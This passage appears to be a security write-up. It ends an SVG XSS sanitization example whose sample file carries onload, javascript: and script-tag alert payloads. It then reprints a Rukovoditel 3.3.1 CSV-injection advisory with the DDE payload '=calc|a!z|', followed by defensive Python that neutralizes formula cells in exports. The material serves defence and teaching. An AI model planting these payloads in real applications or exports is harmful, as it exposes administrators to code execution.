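# Constructed sample: the advisories' payload plus an onload handler and a
# javascript: link, so that all three vectors are present.
SAMPLE_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <a xlink:href="javascript:alert(2)"><text x="5" y="60">click</text></a>
  <script type="text/javascript">alert(document.domain);</script>
</svg>"""

if __name__ == "__main__":
    for finding in audit_svg(SAMPLE_SVG):
        print("reject:", finding)
    print(sanitize_svg(SAMPLE_SVG).decode())
```

Rejecting is simpler and safer than stripping for a logo field. Whatever the policy, the upload should be served with a Content-Disposition: attachment header or rasterised to PNG, and a Content-Security-Policy on the admin pages limits what an SVG that slips through can do. xml.etree does not fetch the external DTD the payload references, but a deployment that parses untrusted XML should use defusedxml to also cover entity-expansion attacks.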

Rukovoditel 3.3.1 - CSV injection

Exploit Title: Rukovoditel 3.3.1 - CSV injection
Version: 3.3.1
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Link: https://www.rukovoditel.net/download.php
Date found: 27-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
Step 1. Log in as a user.
Step 2. Go to My Account (http://127.0.0.1/index.php?module=users/account).
Step 3. Set Firstname to =calc|a!z|
Step 4. If the admin exports customers as a CSV file (http://localhost/index.php?module=items/items&path=1), CSV injection occurs on the admin's computer and the calculator opens.

Payload: =calc|a!z|
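The export above is dangerous because a spreadsheet treats a cell beginning with =, +, -, @ or a tab/carriage return as a formula, so the DDE-style payload runs on the admin's workstation rather than on the server. The following is an added example in Python, not Rukovoditel code: neutralize_cell() applies the usual apostrophe prefix before a value is written, export_csv() uses it for a whole export with every cell quoted, and find_formula_cells() scans an existing export for cells a spreadsheet would still evaluate. The user rows are constructed.

```python
import csv
import io

# Leading characters that make a spreadsheet evaluate the cell instead of displaying it.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Prefix a cell with an apostrophe when a spreadsheet would otherwise evaluate it.

    The check ignores leading whitespace because spreadsheets ignore it too;
    the original text is preserved after the apostrophe.
    """
    text = "" if value is None else str(value)
    if text.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_csv(rows, fieldnames):
    """Render rows (dicts) to CSV text with every cell quoted and neutralized."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(row.get(k)) for k in fieldnames})
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Scan an existing export; return (row, column, value) for cells a spreadsheet would evaluate."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if cell.lstrip().startswith(FORMULA_TRIGGERS):
                hits.append((r, c, cell))
    return hits


# Constructed sample rows: one ordinary user and one whose first name is the
# payload from the advisory above.
SAMPLE_USERS = [
    {"firstname": "Alice", "lastname": "Example", "email": "alice@example.invalid"},
    {"firstname": "=calc|a!z|", "lastname": "Mallory", "email": "mallory@example.invalid"},
]
FIELDS = ["firstname", "lastname", "email"]

if __name__ == "__main__":
    safe = export_csv(SAMPLE_USERS, FIELDS)
    print(safe)
    print("remaining formula cells:", find_formula_cells(safe))
```

The apostrophe also lands on legitimate values such as negative numbers or phone numbers written with a leading plus, which is the accepted trade-off for exports meant to be opened in a spreadsheet; numeric columns can be written as numbers and skipped. Rejecting the trigger characters at input time (the Firstname field here) is a complementary control but not a substitute, since existing data and other entry paths bypass it.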